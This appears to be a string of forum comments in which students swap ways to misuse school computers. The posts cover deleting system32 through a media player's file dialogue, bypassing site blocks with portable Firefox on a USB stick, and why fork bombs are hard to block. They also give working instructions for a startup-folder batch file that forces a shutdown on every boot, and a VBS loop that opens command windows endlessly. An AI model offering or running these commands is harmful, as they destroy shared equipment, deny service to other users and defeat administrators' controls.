I found a way to access system32 through windows media player's explorer dialogue. The school admins blocked access to it every other way, so I thought surely deleting won't work. It worked. They had to throw that PC away. I remember putting portable firefox on a USB to access blocked sites, and installing GTA San Andreas on a USB.

Yes, its becauss it is impossible to simply prevent fork bombs from being run specifically, because id say that if you didnt know what a fork bomb is, it would just look like a keyboard smash, so it would be impossible to block every variation of a fork bomb due to the way they are formatted.
try slipping a usb with a .bat file with "shutdown /s /t 10 /c "whatever you want". then press windows + r and type in "shell:startup" and then enter, drag the batch file into the directory and run it as admin. it will shutdown the computer with the message you entered everytime it starts.
its simple just make a text file, change it to a .vbs file, edit using right click and select edit, and write: Set sh = WScript.CreateObject("WScript.Shell") do sh.Run("CMD") loop
